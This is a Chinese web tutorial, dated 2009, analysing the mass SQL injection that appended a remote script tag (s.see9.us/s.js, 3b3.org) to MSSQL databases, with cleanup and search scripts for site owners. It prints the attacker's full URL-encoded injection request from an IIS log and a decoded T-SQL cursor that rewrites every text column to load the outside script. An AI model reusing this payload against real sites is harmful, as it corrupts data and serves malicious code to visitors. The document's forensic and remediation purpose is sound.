1. 爱易网页
  2. MSSQL教程
  3. 分析src=http://s.see9.us/s.js>亦或3b3.org注入攻击及解决方案探讨.解决思路

分析src=http://s.see9.us/s.js>亦或3b3.org注入攻击及解决方案探讨.解决思路

日期:2014-05-18  浏览次数:20656 次

分析src=http://s.see9.us/s.js>亦或3b3.org注入攻击及解决方案探讨....
author:perfectaction
date :2009.05

从去开始,有很多网站数据库的表的text、ntext、varchar、nvarchar字段内容末尾被加入"></title><script src=http://s.see9.us/s.js><或是3b3.org等字符

我也遇到过,通过分析iis日志,搜索"Update%20",找到很多,如:
2008-**-** 00:17:54 59.39.69.146 - W3SVC1 80 GET show.asp id=8826;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20select%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20where%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('Update%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 302 0 HTTP/1.1 211.68.23.76 Mozilla/4.0 - -

这段代码我还原后如下:
SQL code
declare  @t  varchar(255),@c  varchar(255)  
declare  table_cursor  cursor  for  
select  a.name,b.name  from  sysobjects  a,syscolumns  b  
where  a.iD=b.iD  AnD  a.xtype='u'  
AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)  

open  table_cursor  fetch  next  from  table_cursor  
into  @t,@c  
while(@@fetch_status=0)  
begin  
    print('update  [' + @t + ']  set  [' + @c + ']=rtrim(convert(varchar,[' + @c + '])) + cast(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D  aS  varchar(67))')  
    fetch  next  from  table_cursor  into  @t,@c  
end  
close  table_cursor  deallocate  table_cursor;

实事上,上面的print实际为exec..其原理就是通过遍历所有的表中的字符类型字段,然后update其内容,加上攻击者的字符.

同理,若要去掉这些字符,也可以利用上面的代码:
SQL code
declare  @t  varchar(255),@c  varchar(255)  
declare  table_cursor  cursor  for 
select  a.name,b.name  from  sysobjects  a,syscolumns  b  
where  a.iD=b.iD  AnD  a.xtype='u'
AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)  
declare @str varchar(500)
--这里是你要替换的字符
set @str='"></title><script src=http://s.see9.us/s.js></script><!--'
open  table_cursor  fetch  next  from  table_cursor 
into  @t,@c  while(@@fetch_status=0)
begin
    exec('update  [' + @t + ']  set  [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')      
    fetch  next  from  table_cursor  into  @t,@c
end
close  table_cursor  deallocate  table_cursor;

但事实上,攻击者在update数据库字段时,是采用先截取再加他自己字符的方法,所以对于text/ntext类型,如果你原来的字段内的字符>8000的话,已经无法全部还原成最初状态了.


往往我们还需要看下其它数据库有没有同样被攻击,我写了如下代码:
SQL code
--查某个指定字符出现在哪些表哪些字段:
declare @searchstr nvarchar(500)
set @searchstr ='3b3.org' --这里是你要查的字符内容
declare @t  varchar(255),@c  varchar(255) 
create table # (name varchar(256),cols varchar(4000))
declare  table_cursor  cursor  for
select  a.name,b.name  from  sysobjects  a,syscolumns  b  ,systypes c
where  a.id=b.id  and  a.xtype='u' and b.xtype=c.xtype
and c.name in ('char','nchar','varchar','nvarchar','text','next')
open  table_cursor  fetch  next  from  table_cursor
into  @t,@c
while(@@fetch_status=0)
begin  
    exec('
    set nocount on
    if exists(select top 1 1 from  [' + @t + ']  where  cast([' + @c + '] as varchar(8000)) like ''%'+@searchstr+'%'') 
    begin 
        if not exists(select 1 from # where name='''+@t+''')

相关资料更多>

  1. 重组或重建索引后碎片率一直不变解决方案
  2. ,sql2005中一个困扰小弟我很久的查询
  3. sql 查询 去掉 某行为0的值,该如何解决
  4. 关于union的应用,数据集按类型分三组,希望分别排序后再union到一起
  5. 两表对账,求思路,求sql!
  6. 高分求一解决方案
  7. SQL SERVER 2K用户导出和导入,该如何处理
  8. 急求一汇总SQL,该如何处理
  9. 在sqlserver中,小弟我用到了real类型,小弟我能设置它的小数位数和精度吗